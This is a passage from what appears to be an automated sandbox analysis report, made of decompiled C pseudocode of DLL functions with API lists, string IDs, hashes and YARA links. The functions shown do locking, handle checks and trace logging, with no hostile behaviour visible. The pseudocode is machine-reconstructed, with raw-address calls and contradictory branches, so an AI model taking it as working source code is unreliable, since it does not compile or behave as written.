							 *((intOrPtr*)(_v12 + 8)) =  *_t31;
							_t35 = (_v8 << 5) + 0x6ff74180; // 0xfffffffb
							 *((intOrPtr*)(_v12 + 0x14)) =  *_t35;
							_t96 = _v8 << 5;
							_t67 = _v12;
							_t39 = _t96 + 0x6ff74188; // 0x989680
							 *((intOrPtr*)(_t67 + 0x20)) =  *_t39;
							_t41 = _t96 + 0x6ff7418c; // 0x0
							 *((intOrPtr*)(_t67 + 0x24)) =  *_t41;
							 *((intOrPtr*)(_v12 + 0x1c)) =  *((intOrPtr*)(_v16 + 4));
							 *((intOrPtr*)(_v12 + 0x18)) = _a12;
							 *_a16 = _v12;
							LeaveCriticalSection(0x6ff750ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bb9;
					}
				}
			}













                0x6ff71299
                0x6ff712a4
                0x6ff712a8
                0x6ff712ba
                0x6ff712bf
                0x6ff712c6
                0x00000000
                0x6ff712d8
                0x6ff712dd
                0x6ff712e7
                0x6ff712f9
                0x00000000
                0x6ff71309
                0x6ff71309
                0x6ff7130c
                0x6ff71312
                0x6ff71324
                0x6ff71329
                0x6ff7132e
                0x6ff71334
                0x00000000
                0x00000000
                0x6ff71344
                0x6ff71344
                0x6ff7134b
                0x6ff71350
                0x6ff71355
                0x6ff71321
                0x00000000
                0x6ff71321
                0x6ff71360
                0x6ff71367
                0x6ff7140a
                0x00000000
                0x6ff71410
                0x6ff71373
                0x6ff71385
                0x6ff71391
                0x6ff71397
                0x6ff713a3
                0x6ff713a9
                0x6ff713b5
                0x6ff713bb
                0x6ff713c1
                0x6ff713c4
                0x6ff713c7
                0x6ff713cd
                0x6ff713d0
                0x6ff713d6
                0x6ff713e2
                0x6ff713eb
                0x6ff713f4
                0x6ff713fb
                0x00000000
                0x6ff71401
                0x6ff71421
                0x00000000
                0x6ff71427
                0x6ff712e7

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF712DD
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF712F9
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71421
                  • Part of subcall function 6FF72D50: wcschr.MSVCRT ref: 6FF72D87
                  • Part of subcall function 6FF72D50: wcschr.MSVCRT ref: 6FF72DCF
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF713FB
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7140A
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$wcschr$Enter
                • String ID: %p %s %lx %p$0HDP$p-w
                • API String ID: 263007561-2707375437
                • Opcode ID: 24aee52afdb61eecc8923cd19b2b117c365b96d12c10b0405747b51137c8adf7
                • Instruction ID: 69c6e09fb81e526584b055ddbb585fdcfd13e13ebe1a3bcd311a69370b1ca9e7
                • Opcode Fuzzy Hash: 24aee52afdb61eecc8923cd19b2b117c365b96d12c10b0405747b51137c8adf7
                • Instruction Fuzzy Hash: DE413975A00208EFDB24DF98E590E8DFBB1FF49314F11819AE8059B355DB71AA84CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF718C0, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E6FF718C0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff70000("%p %x %p %p\n", _a4, _a8, _a12, _a16);
				if(_a16 != 0) {
					EnterCriticalSection(0x6ff750ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					} else {
						if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
							_push(_a16);
							_push(_v8 + 0x40);
							_push(_v8 + 0x38);
							_push(_a8);
							_v12 = E6FF72E80(_v8);
							if(_v12 == 0) {
								 *_a16 = 0;
								if(_a12 != 0) {
									 *_a12 =  *((intOrPtr*)(_v8 + 8));
								}
							}
							LeaveCriticalSection(0x6ff750ac);
							return _v12;
						}
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bc6;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff718c9
                0x6ff718e1
                0x6ff718ed
                0x6ff718fe
                0x6ff71908
                0x6ff7191a
                0x00000000
                0x6ff71927
                0x6ff7192e
                0x6ff71945
                0x6ff7194c
                0x6ff71953
                0x6ff71957
                0x6ff71964
                0x6ff7196b
                0x6ff71970
                0x6ff7197a
                0x6ff71985
                0x6ff71985
                0x6ff7197a
                0x6ff7198c
                0x00000000
                0x6ff71992
                0x6ff71935
                0x00000000
                0x6ff7193b
                0x6ff71908
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF718FE
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7191A
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %x %p %p$1HDP$p-w
                • API String ID: 3168844106-2712400308
                • Opcode ID: 2fc83832520a83eb547cec6c2ee3559e788812e8abf17a0e9d1c841a4aabc465
                • Instruction ID: 94d9c87306a91f28c365c18b7691fa41223f6a4b479a247fd8475a7ca2dd5555
                • Opcode Fuzzy Hash: 2fc83832520a83eb547cec6c2ee3559e788812e8abf17a0e9d1c841a4aabc465
                • Instruction Fuzzy Hash: 952125B5501209EFDB10CF98E954B9EB7B5BF4A319F10814AF8059B340DB30AE95CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71570, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF71570(intOrPtr* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t18;
				intOrPtr _t19;
				signed int _t21;
				signed int* _t31;

				_v8 = _a4;
				0x6ff70000("%p %p\n", _a4, _a8);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff750ac);
					if(_v8 == 0) {
						L4:
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					}
					_t18 = _v8;
					if( *_t18 == 0x50444830) {
						0x6ff70000(1);
						if(_t18 == 0) {
							_t19 = E6FF72EB0(_t18);
							0x6ff70000(2, _v8);
							_v16 = _t19;
							_t21 = E6FF71000( *((intOrPtr*)(_v12 + 0x2c)), 0x20, 0);
							_t31 = _a8;
							 *_t31 = _t21 |  *(_v12 + 0x28);
							_t31[1] = 0;
							LeaveCriticalSection(0x6ff750ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff750ac);
						return 0x800007d5;
					}
					goto L4;
				}
				return 0xc0000bbd;
			}










                0x6ff7157a
                0x6ff7158a
                0x6ff71596
                0x6ff715a7
                0x6ff715b1
                0x6ff715be
                0x6ff715c3
                0x00000000
                0x6ff715c9
                0x6ff715b3
                0x6ff715bc
                0x6ff715d2
                0x6ff715dc
                0x6ff715f4
                0x6ff715fe
                0x6ff71606
                0x6ff71615
                0x6ff71624
                0x6ff71627
                0x6ff71629
                0x6ff71631
                0x00000000
                0x6ff71637
                0x6ff715e3
                0x00000000
                0x6ff715e9
                0x00000000
                0x6ff715bc
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF715A7
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF715C3
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$0HDP$p-w
                • API String ID: 3168844106-1388213855
                • Opcode ID: 804ec21d1bfbdb89dd25de0e1e27054e0ef0b72eeee8a2d6fadc284bcc02503c
                • Instruction ID: 3f83744812b91b7c17609dd99ee5627991c7879384cc9a2b971cccf1b7db8494
                • Opcode Fuzzy Hash: 804ec21d1bfbdb89dd25de0e1e27054e0ef0b72eeee8a2d6fadc284bcc02503c
                • Instruction Fuzzy Hash: 58216F75900108EBD724DBA8F911A5DF7B4BF49314F14815BE809DB344EF71A944CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71D50, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E6FF71D50(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff70000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					if(_a8 < 0xfffffff9 || _a8 > 7) {
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbd;
					} else {
						 *((intOrPtr*)(_v8 + 0x10)) = _a8;
						LeaveCriticalSection(0x6ff750ac);
						return 0;
					}
				}
			}




                0x6ff71d57
                0x6ff71d63
                0x6ff71d70
                0x6ff71d7a
                0x6ff71d8c
                0x00000000
                0x6ff71d99
                0x6ff71d9d
                0x6ff71daa
                0x00000000
                0x6ff71db7
                0x6ff71dbd
                0x6ff71dc5
                0x00000000
                0x6ff71dcb
                0x6ff71d9d

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71D70
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71D8C
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71DAA
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71DC5
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: dbe79f8e871db88f06e4b18353df0e6e0167e61e862820d0a5267894a0a0bf11
                • Instruction ID: 27f89e89007807eb020ec893dec44d12dc805afc76dfcd2ea01f25cf30d49e4c
                • Opcode Fuzzy Hash: dbe79f8e871db88f06e4b18353df0e6e0167e61e862820d0a5267894a0a0bf11
                • Instruction Fuzzy Hash: 73012875515608EFCB24DF98E914A9CFBB0BF0A325F11825BF8148A390EB71AA54CE91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF719A0, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF719A0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				intOrPtr _t44;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t65;

				_v8 = _a4;
				0x6ff70000("%p %p %p\n", _a4, _a8, _a12, __ecx);
				if(_a12 != 0) {
					EnterCriticalSection(0x6ff750ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					} else {
						 *_a12 =  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_a12 + 4)) =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_a12 + 8)) =  *((intOrPtr*)(_v8 + 0x2c));
						_t64 = _a12;
						_t44 = _v8;
						 *((intOrPtr*)(_t64 + 0x10)) =  *((intOrPtr*)(_t44 + 0x38));
						 *((intOrPtr*)(_t64 + 0x14)) =  *((intOrPtr*)(_t44 + 0x3c));
						_t58 = _a12;
						_t65 = _v8;
						 *((intOrPtr*)(_t58 + 0x18)) =  *((intOrPtr*)(_t65 + 0x40));
						 *((intOrPtr*)(_t58 + 0x1c)) =  *((intOrPtr*)(_t65 + 0x44));
						 *((intOrPtr*)(_a12 + 0x20)) = 1;
						if(_a8 != 0) {
							 *_a8 =  *((intOrPtr*)(_v8 + 8));
						}
						LeaveCriticalSection(0x6ff750ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}








                0x6ff719a7
                0x6ff719bb
                0x6ff719c7
                0x6ff719d8
                0x6ff719e2
                0x6ff719f4
                0x00000000
                0x6ff71a01
                0x6ff71a0a
                0x6ff71a15
                0x6ff71a21
                0x6ff71a24
                0x6ff71a27
                0x6ff71a2d
                0x6ff71a33
                0x6ff71a36
                0x6ff71a39
                0x6ff71a3f
                0x6ff71a45
                0x6ff71a4b
                0x6ff71a56
                0x6ff71a61
                0x6ff71a61
                0x6ff71a68
                0x00000000
                0x6ff71a6e
                0x6ff719e2
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF719D8
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF719F4
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p %p$1HDP$p-w
                • API String ID: 3168844106-1182936200
                • Opcode ID: f2a50c4d2edea0a9cf06a428b75a462be07698d4f1d5365d38b7527b00c30f3b
                • Instruction ID: 0bb72ed9b9606d3c9bd3d3ace2e0df8c3b66d8d732620e153802d4b1723db2ef
                • Opcode Fuzzy Hash: f2a50c4d2edea0a9cf06a428b75a462be07698d4f1d5365d38b7527b00c30f3b
                • Instruction Fuzzy Hash: 5B31D4B8A00209DFCB04CF58D590A9AB7B1FF49314F21829AEC198B351DB71EE95CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71A80, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF71A80(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff70000("%p 0x%08x %p %p %p\n", _a4, _a8, _a12, _a16, _a20);
				if(_a20 != 0) {
					EnterCriticalSection(0x6ff750ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					} else {
						_push(_a20);
						_push(_a16 + 0x18);
						_push(_a12 + 0x18);
						_push(_a8);
						_v12 = E6FF72E80(_v8);
						LeaveCriticalSection(0x6ff750ac);
						return _v12;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff71a89
                0x6ff71aa5
                0x6ff71ab1
                0x6ff71abf
                0x6ff71ac9
                0x6ff71adb
                0x00000000
                0x6ff71ae8
                0x6ff71aeb
                0x6ff71af2
                0x6ff71af9
                0x6ff71afd
                0x6ff71b0a
                0x6ff71b12
                0x00000000
                0x6ff71b18
                0x6ff71ac9
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71ABF
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71ADB
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p 0x%08x %p %p %p$1HDP$p-w
                • API String ID: 3168844106-3684456673
                • Opcode ID: f8cfd60d773eaeacf54fdc85aaa9d2442f9e63912fc816053381ce73edaabcc7
                • Instruction ID: 380ac1dfdc4829fa77c38a74a09939e2261c7a123f3cd512f758a92b0fdad1aa
                • Opcode Fuzzy Hash: f8cfd60d773eaeacf54fdc85aaa9d2442f9e63912fc816053381ce73edaabcc7
                • Instruction Fuzzy Hash: C8115EB5900109EFDB10DF9CE990E9EB7B5BF48315F10814AF90497341DB30AA60CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF72A30, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF72A30(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				intOrPtr* _t21;
				intOrPtr _t23;

				_v8 = _a4;
				0x6ff70000("%p %p\n", _a4, _a8, __ecx);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff750ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					} else {
						_t21 = _a8;
						_t23 = _v8;
						 *_t21 =  *((intOrPtr*)(_t23 + 0x20));
						 *((intOrPtr*)(_t21 + 4)) =  *((intOrPtr*)(_t23 + 0x24));
						LeaveCriticalSection(0x6ff750ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}






                0x6ff72a37
                0x6ff72a47
                0x6ff72a53
                0x6ff72a61
                0x6ff72a6b
                0x6ff72a7d
                0x00000000
                0x6ff72a8a
                0x6ff72a8a
                0x6ff72a8d
                0x6ff72a93
                0x6ff72a98
                0x6ff72aa0
                0x00000000
                0x6ff72aa6
                0x6ff72a6b
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF72A61
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF72A7D
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$1HDP$p-w
                • API String ID: 3168844106-2469439903
                • Opcode ID: 9059fa7732a66ccca37afd0877d4ba9b602808ef56bc8794b8e1b7a000a778ea
                • Instruction ID: e1beadd7515f6f8734f6df074ebe246e9d83b559ef21a8ed9abb4e7c641c756e
                • Opcode Fuzzy Hash: 9059fa7732a66ccca37afd0877d4ba9b602808ef56bc8794b8e1b7a000a778ea
                • Instruction Fuzzy Hash: DF011675601108EFDB20CF98E500A5DBBF1BF4A315F21819AF8088B300DB32AA41CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF716E0, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF716E0(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff70000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					0x6ff70000(6);
					E6FF72C10(_v8);
					LeaveCriticalSection(0x6ff750ac);
					return 0;
				}
			}




                0x6ff716e7
                0x6ff716f3
                0x6ff71700
                0x6ff7170a
                0x6ff7171c
                0x00000000
                0x6ff71729
                0x6ff7172b
                0x6ff71737
                0x6ff71744
                0x00000000
                0x6ff7174a

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71700
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7171C
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71744
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: fc9898cdfe4caed83b9151107a377fea275b21b833fa81b8738afdceb2655066
                • Instruction ID: 5cdb2a2ff36b5dec4045ff6f8a451a9e79f1e136046e6dc001d8ae19f5a166cf
                • Opcode Fuzzy Hash: fc9898cdfe4caed83b9151107a377fea275b21b833fa81b8738afdceb2655066
                • Instruction Fuzzy Hash: 80F06DB6910208EBD710DB94F905B4DFAB4BF15225F15406AF80496341EF72BA64C692
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71760, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF71760(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff70000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					_push(_v8);
					E6FF72EB0(_v8);
					LeaveCriticalSection(0x6ff750ac);
					return 0;
				}
			}




                0x6ff71767
                0x6ff71773
                0x6ff71780
                0x6ff7178a
                0x6ff7179c
                0x00000000
                0x6ff717a9
                0x6ff717ac
                0x6ff717ad
                0x6ff717ba
                0x00000000
                0x6ff717c0

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71780
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7179C
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF717BA
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$0HDP$p-w
                • API String ID: 2978645861-675403308
                • Opcode ID: cf13d2b095e8acc7f67b592dfbf59ce9a2f482a20227b27b1e257c91682d18c0
                • Instruction ID: 7263be8c9602a49e8b9bb14f71cfa11d2392a18be6a1104b16e6809969073559
                • Opcode Fuzzy Hash: cf13d2b095e8acc7f67b592dfbf59ce9a2f482a20227b27b1e257c91682d18c0
                • Instruction Fuzzy Hash: 9DF05E75911108EBCB10DB98FD04E9DFBB4BF06355F10416AF80496340EF727A54CAA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF72440, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E6FF72440(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr* _a16) {
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t58;
				void* _t60;

				_t31 = _a4;
				0x6ff70000(_t31, _a8, _a12, _a16);
				0x6ff70000("%s %d %p %p\n", _t31);
				_t60 = _t58 + 0x18;
				if(_a4 == 0) {
					if(_a12 == 0 || _a16 == 0) {
						return 0xc0000bbd;
					} else {
						if(_a8 != 0) {
							_v8 = 0;
							while(1) {
								0x6ff70000(0x6ff74170);
								_t60 = _t60 + 4;
								if(_v8 >= _t31) {
									break;
								}
								_t14 = (_v8 << 5) + 0x6ff74170; // 0x6
								_t31 =  *_t14;
								if(_t31 != _a8) {
									_v8 = _v8 + 1;
									continue;
								}
								_t17 = (_v8 << 5) + 0x6ff74174; // 0x6ff76658
								_v12 =  &((wcsrchr( *_t17, 0x5c))[0]);
								_v16 = lstrlenW(_v12) + 1;
								if( *_a16 >= _v16) {
									lstrcpyW(_a12, _v12);
									_v20 = 0;
								} else {
									_v20 = 0x800007d2;
								}
								 *_a16 = _v16;
								return _v20;
							}
							return 0xc0000bbd;
						}
						return 0;
					}
				}
				0x6ff70000("remote machine not supported\n");
				return 0x800007d0;
			}










                0x6ff72452
                0x6ff72456
                0x6ff72464
                0x6ff72469
                0x6ff72470
                0x6ff7248d
                0x00000000
                0x6ff7249f
                0x6ff724a3
                0x6ff724ac
                0x6ff724be
                0x6ff724c3
                0x6ff724c8
                0x6ff724ce
                0x00000000
                0x00000000
                0x6ff724d6
                0x6ff724d6
                0x6ff724df
                0x6ff724bb
                0x00000000
                0x6ff724bb
                0x6ff724e9
                0x6ff724fc
                0x6ff7250c
                0x6ff72517
                0x6ff7252a
                0x6ff72530
                0x6ff72519
                0x6ff72519
                0x6ff72519
                0x6ff7253d
                0x00000000
                0x6ff7253f
                0x00000000
                0x6ff72549
                0x00000000
                0x6ff724a5
                0x6ff7248d
                0x6ff72477
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %s %d %p %p$remote machine not supported
                • API String ID: 0-1546047983
                • Opcode ID: 1b2170b490d93f976d7b9c2fd8390e33aa7bfe4c94e0e07463a9dc5e04a71e87
                • Instruction ID: 8e8c68cba0ab9680bb1844aa9fdba3ae2c588c64f93ed544be4f35be21cb866d
                • Opcode Fuzzy Hash: 1b2170b490d93f976d7b9c2fd8390e33aa7bfe4c94e0e07463a9dc5e04a71e87
                • Instruction Fuzzy Hash: 58314BB1904208EBDB20DF98F980B9EF7B4BF45308F10855AE815DB345DB76AA50CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF7101F, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF7101F(intOrPtr _a8) {
				intOrPtr _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				signed int _t8;
				intOrPtr* _t10;
				signed int _t12;
				intOrPtr* _t14;
				intOrPtr* _t19;
				void* _t22;

				_t3 = _a8;
				if(_t3 != 0) {
					L3:
					_t10 = __imp___adjust_fdiv; // 0x75e56be4
					 *0x6ff76974 =  *_t10;
					if(_t3 != 1) {
						if(_t3 != 0) {
							L15:
							_t4 = 1;
							return _t4;
						}
						_t5 =  *0x6ff7697c; // 0x0
						if(_t5 == 0) {
							goto L15;
						}
						_t12 =  *0x6ff76978; // 0x21f6d40
						_t2 = _t12 - 4; // 0x21f6d3c
						_t19 = _t2;
						while(_t19 >= _t5) {
							_t14 =  *_t19;
							if(_t14 != 0) {
								 *_t14();
								_t5 =  *0x6ff7697c; // 0x0
							}
							_t19 = _t19 - 4;
						}
						free(_t5);
						 *0x6ff7697c =  *0x6ff7697c & 0x00000000;
						goto L15;
					}
					_t7 = malloc(0x80);
					 *0x6ff7697c = _t7;
					if(_t7 != 0) {
						 *_t7 =  *_t7 & 0x00000000;
						_t8 =  *0x6ff7697c; // 0x0
						_push(0x6ff75004);
						_push("(");
						 *0x6ff76978 = _t8;
						L6FF7341C();
						 *0x6ff76970 =  *0x6ff76970 + 1;
						goto L15;
					}
					L5:
					return 0;
				}
				_t22 =  *0x6ff76970 - _t3; // 0x0
